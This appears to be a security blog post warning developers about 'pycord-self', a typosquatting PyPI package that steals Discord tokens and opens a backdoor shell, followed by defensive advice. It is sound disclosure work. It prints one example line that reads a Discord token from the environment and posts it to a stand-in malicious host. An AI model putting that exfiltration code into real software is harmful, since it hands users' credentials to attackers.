🚨 Malicious PyPi Package Steals Discord Auth Tokens from Developers 🚨

🚨 Beware of Dangerous Python Package: 'pycord-self'. A malicious package named 'pycord-self' has been discovered on the Python Package Index (PyPI) targeting Discord developers. This malicious software not only steals authentication tokens but also plants a backdoor that allows remote control over the victim's system. This deceptive package mimics the widely-used 'discord.py-self,' which has nearly 28 million downloads. While the legitimate library offers powerful tools for automating interactions with Discord, the malicious version hides dangerous functionalities that can compromise developers’ systems and data.

📌 Legitimate vs. Malicious Package The legitimate 'discord.py-self' library is a popular Python tool for interacting with Discord’s user API. Developers use it for: 🤖 Creating Discord bots. ⚙️ Automating moderation tasks. 🔔 Sending notifications or auto-responses. 📊 Running commands and retrieving data without requiring a bot account. However, the malicious 'pycord-self' package abuses this trust by embedding harmful code while seemingly offering the same features.

🕵️ Discovery and Findings 🔍 Researchers from Socket, a code security company, discovered the malicious package, which was uploaded to PyPI in June 2024. Since then, it has been downloaded 885 times. Alarmingly, the package remains available on PyPI as of now, despite the publisher’s verified status. How 'pycord-self' Steals Tokens. The malicious package performs two main attacks:

1️⃣ Token Theft The package extracts Discord authentication tokens from the victim’s system and sends them to an external server. These tokens allow attackers to hijack the developer's Discord account without needing credentials, bypassing even two-factor authentication (2FA).

📄 Example of Malicious Code: token = os.getenv("DISCORD_AUTH_TOKEN") requests.post("http://malicious-url.com", data={"token": token})

2️⃣ Creating a Stealthy Backdoor In addition to token theft, the package establishes a persistent backdoor to maintain control over the victim's system. On Linux, it launches a bash shell. On Windows, it opens a cmd shell. The backdoor operates over port 6969, running as a separate thread to avoid detection while the package appears functional. This backdoor gives attackers continuous remote access to the compromised system, making it a serious security risk.

🚨 Visuals of the Malicious Operations 🖥️ Example: Token theft and backdoor mechanisms at work. 🔐 Protect Yourself Against Malicious Packages. Developers can reduce the risk of falling victim to malicious packages like 'pycord-self' by adopting secure coding practices:

1️⃣ Double-Check Package Names Typosquatting, where attackers create malicious packages with similar names to popular ones, is a common trick. Always verify the package name before installation.

2️⃣ Verify the Author Ensure the package comes from the official creator. Cross-reference details on trusted platforms like GitHub or the library’s documentation.

3️⃣ Inspect the Code Review package code for suspicious or obfuscated functions before installation. Tools like diff can help spot unexpected changes in updated packages.

4️⃣ Use Dependency Scanners Employ tools to scan for vulnerabilities or malicious code in dependencies. Scanners can flag potential risks before they compromise your project.

5️⃣ Avoid Over-Reliance on Popularity Even widely downloaded packages can be compromised. Always perform due diligence, regardless of download statistics.

💡 The Role of PyPI and the Developer Community Platforms like PyPI should enhance security by: Introducing stricter verification for publishers. Automating scans for malicious uploads. Educating users on safe package management practices. Developers, on the other hand, must actively report suspicious packages to prevent widespread damage.

📝 Key Takeaways The discovery of 'pycord-self' serves as a stark reminder of the risks involved in using open-source software. Cybercriminals exploit trust in these ecosystems, targeting unwary developers. By staying vigilant and adopting secure habits, you can protect your projects, systems, and sensitive data from falling into the wrong hands. Stay safe, stay informed, and share this article to help others secure their work!

💬 Found this article helpful? Let us know in the comments!